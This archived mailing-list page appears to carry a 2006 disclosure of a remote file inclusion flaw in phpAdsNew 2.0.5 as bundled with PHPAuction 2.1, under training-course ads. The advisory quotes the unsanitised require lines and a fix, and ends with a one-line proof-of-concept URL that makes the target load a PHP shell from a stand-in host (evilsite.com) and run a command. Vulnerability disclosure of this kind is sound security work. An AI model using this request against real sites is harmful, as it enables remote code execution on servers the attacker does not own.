Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

PHPAuction 2.1 (maybe higher) with phpAdsNew 2.0.5 RFI

from [philipp . niedziela] Network Security [Permanent Link]
Subject: PHPAuction 2.1 (maybe higher) with phpAdsNew 2.0.5 RFI
Date: 30 Jul 2006 10:29:15 -0000 
+--------------------------------------------------------------------
+
+ PHPAuction 2.1 with phpAdsNew 2.0.5 Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: PHPAuction 2.1 (maybe higher) with phpAdsNew,
+                      phpAdsNew 2.0.5 (maybe higher)
+ Venedor ...........: http://www.phpauction.net,
+                      http://phpadsnew.com
+ Class .............: Remote File Inclusion in /phpAdsNew/view.inc.php
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/sicherheit_264.htm
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /phpAdsNew/view.inc.php:
+
+ .....
+ // Include required files
+ require ("$phpAds_path/dblib.php"); 
+ require ("$phpAds_path/lib-expire.inc.php");
+ .....
+
+--------------------------------------------------------------------
+
+ $phpAds_path is not properly sanitized before being used.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Declare $phpAds_path before using.
+
+--------------------------------------------------------------------
+ PoC:
+ Place a PHPShell on a remote location:
+ http://evilsite.com/dblib.php/index.html
+
+ 
http://[target]/phpAdsNew/view.inc.php?phpAds_path=http://evilsite.com/dblib.php/&cmd=ls
+
+--------------------------------------------------------------------
+
+ Greets:
+ Krini&Lenni
+
+-------------------------[ E O F ]----------------------------------
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • PHPAuction 2.1 (maybe higher) with phpAdsNew 2.0.5 RFI, philipp . niedziela <=
Previous by Date:  ATutor <= 1.5.3.1 'links' blind SQL injection / admin credentials disclosure, rgod
Next by Date:  Re: cpanel login problem, usar_y_tirar
Previous by Thread:  ATutor <= 1.5.3.1 'links' blind SQL injection / admin credentials disclosure, rgod
Next by Thread:  SQL injection Seir Anphin v666 Community Management System, vulnerabilities
Indexes:  [Date] [Thread] [Top] [All Lists]